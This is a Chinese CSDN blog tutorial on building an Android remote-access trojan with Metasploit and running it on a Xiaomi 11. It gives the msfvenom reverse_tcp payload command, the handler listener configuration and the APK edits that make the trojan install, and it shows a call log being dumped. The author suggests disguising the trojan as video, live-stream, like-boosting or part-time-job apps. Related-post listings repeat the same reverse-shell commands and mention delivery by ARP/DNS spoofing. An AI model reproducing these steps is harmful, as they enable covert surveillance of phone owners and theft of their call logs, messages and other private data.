msf对小米11进行安全渗透

已于 2022-12-01 22:54:29 修改
阅读量5.1k 收藏 55
点赞数 11
分类专栏: 渗透测试 文章标签: 安全 android mfc
于 2022-08-24 20:04:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30817059/article/details/126511763
版权 
作者:SwBack
技术交流Q群:768493664

文章在饭前编写,由于着急吃饭,所以排版比较乱

环境配置

工具型号接入方式
kali2021桥接
安卓手机小米11WIFI
Android KillerV1.3.1.0apktools 2.6.1

实验过程中小米11 未提示风险,(仅签名问题提示非小米应用商店app)
但是功能实际都被拦截,无法获取敏感信息,如通话记录,短信等。
当开启权限之后,信息被成功获取。如文章最下图

实战过程中可以对app进行伪装,修改图标,标题,版本,签名

如(XX直播,XX视频,刷赞,兼职,XX游戏等等)

启动kali后,先查看自己本机IP地址如下

┌──(root💀kali)-[~/桌面]
└─# ip a                                           
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:91:2d:65 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.105/24 brd 192.168.0.255 scope global dynamic noprefixroute eth0
       valid_lft 6529sec preferred_lft 6529sec
    inet6 fe80::20c:29ff:fe91:2d65/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

在这里插入图片描述

生成木马

然后执行如下命令生成木马文件.

这里监听了5555端口

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=5555 R >Android.apk

开启msf后,加载攻击载荷

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
#设置监听IP
set LHOST 192.168.0.105
#设置监听端口
set LPORT 5555
#进行监听
run

这里的apk还无法直接在安卓中运行。

提示如下:

在这里插入图片描述

修改木马

通过对apk反编译。

网上说修改AndroidManifest.xml 文件.

不过该文件需要反编译才能查看。推荐使用xml2axml.jar工具进行,该工具可以直接反编译和编译。

这里我们修改apktool.yml

minSdkVersion修改为16

targetSdkVersion修改为23

在这里插入图片描述

对其进行编译

在这里插入图片描述

攻击成功

导入手机安装运行之后kali 回显如下内容证明攻击成功。

在这里插入图片描述

执行下命令app_list 查看下软件列表,看下用什么app看视频

在这里插入图片描述在这里插入图片描述

获取通话记录

meterpreter > dump_calllog
[*] Fetching 624 entries
[*] Call log saved to calllog_dump_20220824201308.txt

在这里插入图片描述
在这里插入图片描述

最后

在这里可以通过? 进行查看命令

在这里插入图片描述

SwBack
关注
  • 11
    点赞
  • 55
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 25
    评论
专栏目录
Kali利用MSF渗透安卓手机_kali入侵安卓手机,网易严选网络安全开发三面面经
m0_60607397的博客
04-05 1352
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 723
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
浅谈MSF渗透测试
02-24
渗透过程MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务框架,新的免杀模块,优化了控制功能等。下面小白总结了一下在渗透测试,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
MSF入侵安卓手机
2301_77162959的博客
07-11 1217
里边安装了许许多多的工具。其MSF就自带有。MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试。
Msf 入侵安卓手机
weixin_30378311的博客
09-21 979
MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。 1.查看ip ifconfig 2.生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ribe...
利用MSF攻击Android
qq_45746768的博客
07-08 3794
利用Metasploit攻击Android
msf渗透安卓机
weixin_30872499的博客
05-29 539
/*metasploit之远控*/msfconsole //开启metasploit模块/*根据自己的IP生成一个木马*/msfvenom -p 系统/meterpreter/reverse_tcp LHOST=IP LPORT = 端口 R> 文件名.exe(安卓.apk) use expolit/multi/handler //开启模块 show options //查看参数设置...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
msf 渗透测试
06-05
msf渗透
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
74-74.渗透测试-MSF核心模块.mp4
最新发布
05-10
74-74.渗透测试-MSF核心模块.mp4
MSF渗透测试android手机
永远是少年
06-15 4925
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透测试android手机。 一、Android木马生成 二、Android木马安装 三、效果检验
Kali Linux使用MSF木马入侵安卓手机
philip_z的博客
02-13 8047
Kali Linux使用MSF木马入侵安卓手机
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 5326
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
使用msf工具对安卓手机进行渗透攻击———超详细
热门推荐
weixin_71669458的博客
07-28 1万+
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。
msf入侵安卓实战
m0_65109001的博客
01-04 2478
msf安卓渗透
使用kali的msf渗透安卓手机
r7rrtyrytr的博客
01-30 3563
#1# 生成安卓手机木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=(本机ip) LPORT=4444 R > /home/kali/Desktop/111.apk apk生成后会保存在桌面上。 #2# 加载模块 use exploit/multi/handler #3# 选择Payload set payload android/meterpreter/reverse_tcp #4# 查看参数并设置 show o
MSF和永恒之蓝&渗透安卓手机
niqiu320的博客
04-23 2212
Metasploit简介 Metasploit框架是一个开源的渗透工具,它是由Ruby语言编写的模块化框架,具有良好的扩展性,通过它可以轻易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 它提供了多个基本的用户接口,包括终端、命令行、图形化等,一般我们使用较多的是终端MSF和图形化的Armitage 它分为社区版和商业版 qpt-get update apt-get install metasploit-framework MSF框架是由多个模块组成的,具体的模块
linux入侵安卓,msf入侵android
weixin_39679061的博客
05-13 1004
金风玉露一相逢,便胜却,人间无数。两情若是久长时,尤其在,朝朝暮暮。我,恋爱了….实验环境攻击机:kali linux :192.168.0.103受害机:安卓:192.168.0.104用到的工具:- Metasploit- msfvenom- keytools- jarsigner- zipalign- Ettercap实验开始首先使用msfvenom生成一个apk木马1root@kali:~...
使用kali msf对自己的手机进行渗透的完整指令
06-11
在使用 Metasploit 渗透测试工具进行攻击前,需要明确一点:您必须拥有目标手机的授权。否则,您的行为将违反法律法规,承担法律责任。 以下是在 Kali 使用 Metasploit 渗透测试工具对 Android 手机进行攻击的一般步骤: 1. 打开终端,输入 `msfconsole` 命令启动 Metasploit 控制台。 2. 在 Metasploit 控制台,输入 `use exploit/multi/handler` 命令,选择要使用的 exploit 模块。 3. 设置监听器参数,包括 `LHOST`(监听主机的 IP 地址)和 `LPORT`(监听的端口号)。例如,输入 `set LHOST 192.168.0.100` 和 `set LPORT 4444` 命令设置监听器。 4. 输入 `exploit` 命令启动监听器,并等待目标手机连接。 5. 在目标手机上安装 Metasploit 的反向 shell 客户端。可以使用 Metasploit 的 `android/meterpreter/reverse_tcp` 模块生成反向 shell 客户端,或者使用其他工具生成。将反向 shell 客户端安装在目标手机上。 6. 反向 shell 客户端连接到监听器后,您就可以在 Metasploit 控制台执行一些命令,例如 `meterpreter > sysinfo` 命令查看目标手机的系统信息,或者 `meterpreter > shell` 命令在目标手机上打开一个 shell 终端。 请注意,这只是一般的步骤,实际操作可能会因为目标手机的不同而有所不同。而且,再次强调,您必须拥有目标手机的授权才能进行渗透测试,否则将涉嫌违法行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 25
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SwBack

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值